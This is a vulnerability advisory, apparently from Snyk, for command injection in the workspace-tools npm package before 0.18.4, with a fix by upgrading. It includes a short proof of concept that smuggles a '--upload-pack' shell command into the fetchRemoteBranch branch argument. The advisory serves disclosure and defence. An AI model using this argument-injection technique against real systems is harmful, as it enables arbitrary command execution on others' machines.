Command Injection Affecting workspace-tools Open this link in a new tab package, versions <0.18.4

  • Exploit Maturity

    Proof of concept

  • Attack Complexity


  • Confidentiality


  • Integrity


  • Availability


Do your applications use this vulnerable package?

In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.

Test your applications
  • snyk-id


  • published

    11 May 2022

  • disclosed

    11 Mar 2022

  • credit

    Alessio Della Libera of Snyk Research Team

How to fix?

Upgrade workspace-tools to version 0.18.4 or higher.


workspace-tools is a JS Monorepo Workspace Tools.

Affected versions of this package are vulnerable to Command Injection via git argument injection. When calling the fetchRemoteBranch(remote: string, remoteBranch: string, cwd: string) function, both the remote and remoteBranch parameters are passed to the git fetch subcommand in a way that additional flags can be set. The additional flags can be used to perform a command injection.


const workspace_tools = require("workspace-tools");

workspace_tools.init("./", "username", "password") // or git init

let remote1 = "origin";
let remoteBranch1 = "--upload-pack=touch HELLO1;";
workspace_tools.fetchRemoteBranch(remote1, remoteBranch1, "./") // git [ 'fetch', 'origin', '--upload-pack=touch HELLO1;' ]

// let remote2 = "--upload-pack=touch HELLO2;";
// let remoteBranch2 = "foo";
// workspace_tools.fetchRemoteBranch(remote2, remoteBranch2, "./") // git [ 'fetch', '--upload-pack=touch HELLO2;', 'foo' ]